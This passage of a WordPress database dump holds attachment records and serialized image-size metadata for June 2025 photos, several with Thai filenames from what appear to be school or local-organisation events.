(3780,1350,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:68:\"2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_17.jpg\";s:8:\"filesize\";i:274634;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_17-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16338;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันไหว้ครู-2568_250613_17-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122678;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_17-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8104;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_17-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77088;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_17-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20737;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3781,1351,'_wp_attached_file','2025/06/S__76111879_0.jpg'),
(3782,1351,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2025/06/S__76111879_0.jpg\";s:8:\"filesize\";i:445138;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__76111879_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15374;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__76111879_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122183;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__76111879_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7449;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__76111879_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75210;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__76111879_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:233310;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__76111879_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19701;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3783,1352,'_wp_attached_file','2025/06/S__76111881_0.jpg'),
(3784,1353,'_wp_attached_file','2025/06/S__76111882_0.jpg'),
(3785,1352,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2025/06/S__76111881_0.jpg\";s:8:\"filesize\";i:308359;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__76111881_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14009;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__76111881_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95174;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__76111881_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7814;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__76111881_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61373;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__76111881_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:171657;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__76111881_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17530;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3786,1353,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2025/06/S__76111882_0.jpg\";s:8:\"filesize\";i:442257;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__76111882_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16009;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__76111882_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:125711;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__76111882_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8415;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__76111882_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78567;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__76111882_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:235137;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__76111882_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20201;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3787,1354,'_wp_attached_file','2025/06/S__76111883_0.jpg'),
(3788,1354,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2025/06/S__76111883_0.jpg\";s:8:\"filesize\";i:428725;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__76111883_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15821;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__76111883_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122558;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__76111883_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8330;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__76111883_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76525;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__76111883_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:229049;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__76111883_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20007;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3789,1355,'_wp_attached_file','2025/06/S__76111884_0.jpg'),
(3790,1355,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2025/06/S__76111884_0.jpg\";s:8:\"filesize\";i:493593;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__76111884_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18679;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__76111884_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:141549;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__76111884_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8637;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__76111884_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88324;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__76111884_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:262460;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__76111884_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23709;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3791,1356,'_wp_attached_file','2025/06/S__76111885_0.jpg'),
(3792,1356,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2025/06/S__76111885_0.jpg\";s:8:\"filesize\";i:418755;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__76111885_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16816;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__76111885_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122055;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__76111885_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8270;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__76111885_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76751;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__76111885_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:225919;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__76111885_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21467;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3793,1357,'_wp_attached_file','2025/06/S__76111886_0.jpg'),
(3794,1357,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2025/06/S__76111886_0.jpg\";s:8:\"filesize\";i:458695;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__76111886_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17360;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__76111886_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131985;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__76111886_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8031;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__76111886_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82609;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__76111886_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:246449;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__76111886_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22593;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3796,1333,'_thumbnail_id','1354'),
(3797,1333,'_edit_last','1'),
(3798,1333,'title_style','default'),
(3799,1333,'_title_style','field_5d1a0217cf408'),
(3800,1333,'related',''),
(3801,1333,'_related','field_603b51c3e183e'),
(3802,1358,'title_style','default'),
(3803,1358,'_title_style','field_5d1a0217cf408'),
(3804,1358,'related',''),
(3805,1358,'_related','field_603b51c3e183e'),
(3806,1359,'_edit_lock','1749791216:1'),
(3807,1360,'_wp_attached_file','2025/06/S__71196699.jpg'),
(3808,1360,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1566;s:6:\"height\";i:1044;s:4:\"file\";s:23:\"2025/06/S__71196699.jpg\";s:8:\"filesize\";i:540813;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__71196699-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23295;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__71196699-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:177949;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__71196699-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9684;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__71196699-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111040;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"S__71196699-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:329496;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__71196699-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24628;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3809,1361,'_wp_attached_file','2025/06/S__67395613_0.jpg'),
(3810,1361,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:25:\"2025/06/S__67395613_0.jpg\";s:8:\"filesize\";i:762026;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__67395613_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24246;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__67395613_0-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:213225;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__67395613_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11451;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__67395613_0-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131003;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__67395613_0-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:403540;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__67395613_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31262;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3811,1362,'_wp_attached_file','2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_6.jpg'),
(3812,1362,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:138:\"2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_6.jpg\";s:8:\"filesize\";i:477051;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:138:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_6-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24720;}s:5:\"large\";a:5:{s:4:\"file\";s:139:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_6-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:196583;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:138:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9031;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:139:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_6-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:196583;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:138:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_6-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24009;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3813,1363,'_wp_attached_file','2025/06/S__67395611_0.jpg'),
(3814,1363,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:25:\"2025/06/S__67395611_0.jpg\";s:8:\"filesize\";i:774688;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__67395611_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23372;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__67395611_0-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:209469;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__67395611_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10996;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__67395611_0-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:127312;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__67395611_0-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:402526;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__67395611_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30120;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3815,1364,'_wp_attached_file','2025/06/สีฟ้า-สีส้ม-ทันสมัย-ข่าวประชาสัมพันธ์-การประชุมองค์กรท้องถิ่น-จดหมายข่าว.jpg'),
(3816,1364,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:218:\"2025/06/สีฟ้า-สีส้ม-ทันสมัย-ข่าวประชาสัมพันธ์-การประชุมองค์กรท้องถิ่น-จดหมายข่าว.jpg\";s:8:\"filesize\";i:606903;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:218:\"สีฟ้า-สีส้ม-ทันสมัย-ข่าวประชาสัมพันธ์-การประชุมองค์กรท้องถิ่น-จดหมายข่าว-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27246;}s:5:\"large\";a:5:{s:4:\"file\";s:219:\"สีฟ้า-สีส้ม-ทันสมัย-ข่าวประชาสัมพันธ์-การประชุมองค์กรท้องถิ่น-จดหมายข่าว-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:203389;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:218:\"สีฟ้า-สีส้ม-ทันสมัย-ข่าวประชาสัมพันธ์-การประชุมองค์กรท้องถิ่น-จดหมายข่าว-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10608;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:219:\"สีฟ้า-สีส้ม-ทันสมัย-ข่าวประชาสัมพันธ์-การประชุมองค์กรท้องถิ่น-จดหมายข่าว-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:223985;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:220:\"สีฟ้า-สีส้ม-ทันสมัย-ข่าวประชาสัมพันธ์-การประชุมองค์กรท้องถิ่น-จดหมายข่าว-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:380534;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\"